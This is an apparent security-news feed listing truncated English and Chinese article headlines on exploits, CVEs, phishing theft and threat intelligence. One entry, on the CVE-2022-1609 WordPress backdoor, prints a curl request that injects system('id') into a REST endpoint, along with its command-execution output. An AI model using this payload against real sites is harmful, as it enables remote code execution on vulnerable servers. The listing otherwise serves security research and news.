NetUSB exploitation part 1: Setting up the environment
In Pwn2Own Austin 2021, we also exploited TP-Link Archer C7 and Netgear R6700v3 routers. This is the first part of how we attacked the NetUSB kerne...
Encrypting our way to SSRF in VMWare Workspace One UEM (CVE-2021-22054)
Introduction What is VMWare Workspace One UEM (AirWatch)? Code Analysis Making a PoC Discovering the Variants PoCs Vendor Response Re...
每周蓝军技术推送(2022.5.21-5.27)
Web安全Web skimming 攻击中的代码混淆技术https://www.microsoft.com/security/blog/2022/05/23/beneath-the-surface-uncovering-the-shift-in-web-skimming...
慢雾:29 枚 Moonbirds NFT 被盗事件溯源分析
By:山哥&耀@慢雾安全团队事件背景5 月 25 日,推特用户 @0xLosingMoney 称监测到 ID 为 @Dvincent_ 的用户通过钓鱼网站 p2peers.io 盗走了 29 枚 M...
蓝军技术推送-windows域专题(KrbRelayUp、bypass机器用户添加限制、ad域渗透可视化工具)
蓝军技术推送[文章推荐] Detecting and preventing privilege escalation attacks leveraging Kerberos relaying (KrbRelayUp)文章看点:windows defender团...
Chrome 尚未修复的0day?!
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及...
每周高级威胁情报解读(2022.05.19~05.26)
2022.05.19~05.26 攻击团伙情报Sandworm 使用新版 ArguePatch 攻击乌克兰目标Turla组织新的间谍活动瞄准东欧目标Wizard Spider团伙开发的加密器分析攻击行动...
CVE-2022-1609 WordPress Weblizar后门
$ curl -s -d 'blowfish=1' -d 'blowf=system('id');' 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www...
每日安全动态推送(05-27)
Tencent Security Xuanwu Lab Daily News• NetUSB exploitation part 1: Setting up the environment:https://blog.security.sea.com/posts/netusb-emul...
针对GPS追踪器设备的安全研究(part2)
针对GPS追踪器设备的安全研究(part1) 0x01 背景描述在上一篇中,我发布了对在GPS跟踪设备网络中发现的漏洞的深入分析。自从我向制造商深圳i365披露我的发现...